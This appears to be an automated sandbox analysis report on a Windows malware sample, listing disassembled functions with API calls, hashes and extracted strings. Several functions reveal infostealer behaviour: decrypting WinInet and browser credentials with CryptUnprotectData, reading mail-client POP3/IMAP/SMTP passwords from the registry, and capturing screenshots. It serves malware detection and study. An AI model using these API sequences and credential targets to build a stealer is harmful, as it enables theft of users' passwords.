                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: c345846cde28818473ef1ab384f8890cfd72d6d7708f8b97ff4e09b516dbed37
                                                                                                    • Instruction ID: 3dc3b3e41f486f9b69d6d19c1eacb35d909ce3a086fcaed822057e797154ffcd
                                                                                                    • Opcode Fuzzy Hash: c345846cde28818473ef1ab384f8890cfd72d6d7708f8b97ff4e09b516dbed37
                                                                                                    • Instruction Fuzzy Hash: 46F0BB3160012CBADB225B269C05B5B3798AF417A2B15441FAD05B6353EE68DD0D86ED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A981, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A99A
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 3878998205-0
                                                                                                    • Opcode ID: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
                                                                                                    • Instruction ID: 786aef3f6954a22798eff1a87afa34900a3c8d969515b4c2b0423792bc31befd
                                                                                                    • Opcode Fuzzy Hash: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
                                                                                                    • Instruction Fuzzy Hash: A3F0E97131070457EB346626CD4577BB3A8AF80315F010C7FA981F31C1E6B8AC50855E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045918E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
                                                                                                    • Instruction ID: 56f4cfcb82363ac18a679079ea8552777963f317c6836842f6b813f2b54360bc
                                                                                                    • Opcode Fuzzy Hash: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
                                                                                                    • Instruction Fuzzy Hash: BAE0A035100A33E6BA2126669C0875B3A49DB023A6F1D0527AC0592783DB28CC0985ED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A676, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog2.LIBCMT ref: 0040A67D
                                                                                                      • Part of subcall function 0040A2D4: __EH_prolog.LIBCMT ref: 0040A2D9
                                                                                                      • Part of subcall function 004432AB: RaiseException.KERNEL32(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologH_prolog2Raise
                                                                                                    • String ID:
                                                                                                    • API String ID: 1276564762-0
                                                                                                    • Opcode ID: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
                                                                                                    • Instruction ID: 6cdaae375658fcdab4018d469116dcf97d3cd22aaeaeab6f728bc95c36adb6c4
                                                                                                    • Opcode Fuzzy Hash: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
                                                                                                    • Instruction Fuzzy Hash: 64F08C31910118BADB10FBA1CC4AFDE7B38BF04308F1480AAB144B70D1EB38AA08CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AC66, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 004137E4: __EH_prolog.LIBCMT ref: 004137E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: d696504663ba625c4643022ee5aed457fcf869ffacf77d854e01dfb2a1a3e385
                                                                                                    • Instruction ID: 7b56fd564ee5dba22c1b256a7910ee9a5b5d76db5c36e8c87beafa9b19ca48cc
                                                                                                    • Opcode Fuzzy Hash: d696504663ba625c4643022ee5aed457fcf869ffacf77d854e01dfb2a1a3e385
                                                                                                    • Instruction Fuzzy Hash: 27E06DB1A247159BCB14DF68C80168AB6E4EB58758B10C93FA445E3340E778DA008788
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AF03, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AF08
                                                                                                      • Part of subcall function 00413886: __EH_prolog.LIBCMT ref: 0041388B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 1c6f3859541c96ff36899086369ec62dc06fc6e134c0e1a876c6ff1225329e3e
                                                                                                    • Instruction ID: 6095d6418412deed06a35367cec5ea556f7f2b94be48555c84b2d961f3d52009
                                                                                                    • Opcode Fuzzy Hash: 1c6f3859541c96ff36899086369ec62dc06fc6e134c0e1a876c6ff1225329e3e
                                                                                                    • Instruction Fuzzy Hash: 37E06DB2A257159BCB18DF68C80168A76E4EB18758B10C93FB445E3300E778DA008788
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043F433, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 1306739567-0
                                                                                                    • Opcode ID: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
                                                                                                    • Instruction ID: 558cf98cde0a510390d68fe92a3eaff0fba5e2f9fa2b07517afb1c2e6d705b46
                                                                                                    • Opcode Fuzzy Hash: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
                                                                                                    • Instruction Fuzzy Hash: 7FD0C9B6501118BFFA012B959C05CF7BB9CEF197A1B009022FE44CA011D5729D1097B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041C959, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_fs_set_current_path@4.LIBCPMT ref: 0041C967
                                                                                                      • Part of subcall function 0040A676: __EH_prolog2.LIBCMT ref: 0040A67D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog2___std_fs_set_current_path@4
                                                                                                    • String ID:
                                                                                                    • API String ID: 2482923176-0
                                                                                                    • Opcode ID: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
                                                                                                    • Instruction ID: 0a86e6c55615681b0d0e75044d596b77bbb09aa8d0d1ee6bb9c17a49818965c4
                                                                                                    • Opcode Fuzzy Hash: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
                                                                                                    • Instruction Fuzzy Hash: A6C01270A72B2043CA24656DBD488C751DD5F0F709710887FB881D3604D578CD8546EC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00463EA7, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
                                                                                                    • Instruction ID: 1683f18ab777b9f427d836d21452a745f8e35c4b12b45357bacd302cc903320f
                                                                                                    • Opcode Fuzzy Hash: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
                                                                                                    • Instruction Fuzzy Hash: 28D06C3210010DBBDF128F94DC06EDA3BAAFB4C714F018050FA1856020C772E821AB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00435DD0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00435DEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
                                                                                                    • Opcode ID: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
                                                                                                    • Instruction ID: 6223cfaa72ab82669a20bc440cf7149b8fb7925aead8d04b015655650725991c
                                                                                                    • Opcode Fuzzy Hash: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
                                                                                                    • Instruction Fuzzy Hash: 93D0C974D0810DEBCF50DB90D949AC9B7BCAB04308F0004A294C1E3140EAF4ABCA9B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042A869, Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0042A878
                                                                                                      • Part of subcall function 0042A224: CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
                                                                                                      • Part of subcall function 0042A130: lstrlenW.KERNEL32(?), ref: 0042A156
                                                                                                      • Part of subcall function 0042A130: lstrlenW.KERNEL32(00000002), ref: 0042A167
                                                                                                      • Part of subcall function 0042A130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
                                                                                                      • Part of subcall function 0042A130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
                                                                                                      • Part of subcall function 0042A130: LocalFree.KERNEL32(?), ref: 0042A200
                                                                                                      • Part of subcall function 0042A130: CredFree.ADVAPI32(?), ref: 0042A219
                                                                                                      • Part of subcall function 0042A2F9: GetVersionExW.KERNEL32(?), ref: 0042A341
                                                                                                      • Part of subcall function 0042A2F9: LoadLibraryA.KERNEL32(?), ref: 0042A395
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 1367598280-0
                                                                                                    • Opcode ID: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
                                                                                                    • Instruction ID: ebd16326eb686ad43e5c991a10910887fe2c550f7f1a0d1f856031dafe3edce1
                                                                                                    • Opcode Fuzzy Hash: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
                                                                                                    • Instruction Fuzzy Hash: F8E0C230668204ABC204EB51ED07B6AB3D8DB40B19F40865DBC9C422D0BFB8AD24D66B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 00434A5F, Relevance: 73.8, APIs: 10, Strings: 32, Instructions: 282stringencryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                      • Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                    • CryptUnprotectData.CRYPT32(0047CB80,00000000,00000000,00000000,00000000,00000001,?), ref: 00434CB2
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CEA
                                                                                                    • lstrlenW.KERNEL32(POP3 Password,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CF7
                                                                                                    • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434D1B
                                                                                                    • lstrlenW.KERNEL32(POP3 Port,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434D9C
                                                                                                    • wsprintfA.USER32 ref: 00434DC8
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00434DD5
                                                                                                    • lstrlenW.KERNEL32(000007FF,?,?,00000000,00000000), ref: 00434B4A
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    • lstrlenW.KERNEL32(SMTP Email Address,?,?,00000000,00000000), ref: 00434B26
                                                                                                      • Part of subcall function 00435A1E: lstrlenA.KERNEL32(?,?,751469A0,?,00000000), ref: 00435A4F
                                                                                                      • Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 00435A6E
                                                                                                      • Part of subcall function 00435A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 00435A91
                                                                                                      • Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0), ref: 00435ABD
                                                                                                      • Part of subcall function 00435ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B00
                                                                                                      • Part of subcall function 00435ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B27
                                                                                                    • lstrlenW.KERNEL32(POP3 Password2,?,?,?,?,?,?,00000000,00000000), ref: 00434BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
                                                                                                    • String ID: %d$Email$HTTP Password$HTTP Server URL$HTTP User$HTTPMail Password2$HTTPMail Server$HTTPMail User Name$IMAP Password$IMAP Password2$IMAP Port$IMAP Server$IMAP User$IMAP User Name$NNTP Email Address$NNTP Password$NNTP Password2$NNTP Server$NNTP User Name$POP3 Password$POP3 Password2$POP3 Port$POP3 Server$POP3 User$POP3 User Name$SMTP Email Address$SMTP Password$SMTP Password2$SMTP Port$SMTP Server$SMTP User$SMTP User Name
                                                                                                    • API String ID: 2832241015-3646352405
                                                                                                    • Opcode ID: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
                                                                                                    • Instruction ID: 91bb0a062eb22744b558d3d2405683025fa418893456fa80a50a6e8a22fc02ee
                                                                                                    • Opcode Fuzzy Hash: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
                                                                                                    • Instruction Fuzzy Hash: B1B153B1E002189BDF00EF959885BEE77B9AF49304F14D05EE409BB341DBB86E458B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042C157, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 193windowmemoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042C15C
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042C18A
                                                                                                    • GetDesktopWindow.USER32 ref: 0042C190
                                                                                                    • GetWindowRect.USER32 ref: 0042C19D
                                                                                                    • GetWindowDC.USER32(00000000), ref: 0042C1A4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042C1C4
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0042C1CD
                                                                                                    • CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042C218
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0042C22C
                                                                                                    • DeleteDC.GDI32(?), ref: 0042C231
                                                                                                    • SaveDC.GDI32(00000000), ref: 0042C238
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0042C244
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042C25D
                                                                                                    • RestoreDC.GDI32(00000000,00000000), ref: 0042C265
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0042C272
                                                                                                    • DeleteDC.GDI32(?), ref: 0042C277
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0042C27B
                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042C29B
                                                                                                    • _mbstowcs.LIBCMT ref: 0042C30E
                                                                                                    • GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042C32B
                                                                                                    • DeleteObject.GDI32(00000010), ref: 0042C350
                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 0042C359
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
                                                                                                    • String ID: (
                                                                                                    • API String ID: 4140672344-3887548279
                                                                                                    • Opcode ID: ee452e9286a77be8a67468663f3cbac1fef3d69f6f90eec1fc67510fad94b49c
                                                                                                    • Instruction ID: 536baf2ac2d265ee9edbed5a4aa1064016baa7b26e1b3fc26adfe330e756f817
                                                                                                    • Opcode Fuzzy Hash: ee452e9286a77be8a67468663f3cbac1fef3d69f6f90eec1fc67510fad94b49c
                                                                                                    • Instruction Fuzzy Hash: D471F5B2E00219EFDB11DFA5DD849AEBBB8FF08344F10452AE906E7210E7745942CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E139, Relevance: 30.9, APIs: 13, Strings: 4, Instructions: 1136libraryloaderencryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040E13E
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E198
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E1DC
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E22A
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E277
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E2C1
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E30B
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E34E
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E390
                                                                                                    • wsprintfA.USER32 ref: 0040E409
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 0043584C: __EH_prolog.LIBCMT ref: 00435851
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED19
                                                                                                    • LocalFree.KERNEL32(?,?,?), ref: 0040ED84
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$H_prolog$Deallocate$CryptDataFreeLocalUnprotect_free_strcatwsprintf
                                                                                                    • String ID: 360Browser$Opera$S$UCBrowser
                                                                                                    • API String ID: 1533498561-2102145511
                                                                                                    • Opcode ID: 9ecdfc24243a44c1e2b78dfa5c8c319f2053c2a80f35aef722363a7d4d965330
                                                                                                    • Instruction ID: b48f6e05fcb707e89987015dea396383d640a2a9a36e0cc3998b43e1c57b30ee
                                                                                                    • Opcode Fuzzy Hash: 9ecdfc24243a44c1e2b78dfa5c8c319f2053c2a80f35aef722363a7d4d965330
                                                                                                    • Instruction Fuzzy Hash: ECB2BA30D00268CBDB21DB65CD94BEEBBB4AF59304F1045EAE409B7292DB745E88CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00462391, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00462452
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?), ref: 0046247D
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00462511
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0046251F
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                    • String ID: 0&G$utf8
                                                                                                    • API String ID: 4147378913-2116212543
                                                                                                    • Opcode ID: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
                                                                                                    • Instruction ID: 80d7c2a65ae141ca0afc562d5d58411de800cdeae6eec3c0137acb6db90b692b
                                                                                                    • Opcode Fuzzy Hash: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
                                                                                                    • Instruction Fuzzy Hash: 1B711971A00A01B6D725AB35CD45BAB73A8EF44354F14442BF906D7281FBBCE941876F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0046475B, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
                                                                                                    • Instruction ID: b99cd9423779b4525a49100b28b65ef5ab2a0d10b4fffb5f170f5505121d02b7
                                                                                                    • Opcode Fuzzy Hash: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
                                                                                                    • Instruction Fuzzy Hash: AFC22671E046288FDF25CE28DD407EAB3B5EB89315F1441EBD84DA7240E778AE858F46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410648, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 611libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041064D
                                                                                                      • Part of subcall function 00411E16: __EH_prolog.LIBCMT ref: 00411E1B
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • LoadLibraryA.KERNEL32(00000000,?), ref: 00410699
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004106F5
                                                                                                      • Part of subcall function 0040BB39: __EH_prolog.LIBCMT ref: 0040BB3E
                                                                                                      • Part of subcall function 0040BB39: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
                                                                                                      • Part of subcall function 0040BB39: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410E60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
                                                                                                    • String ID: Opera
                                                                                                    • API String ID: 1239964785-505338728
                                                                                                    • Opcode ID: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
                                                                                                    • Instruction ID: ac1ca881525ca60fb4c11f72a3a0c97497af74f9ee91cf4d6f14cdaa43dc21d9
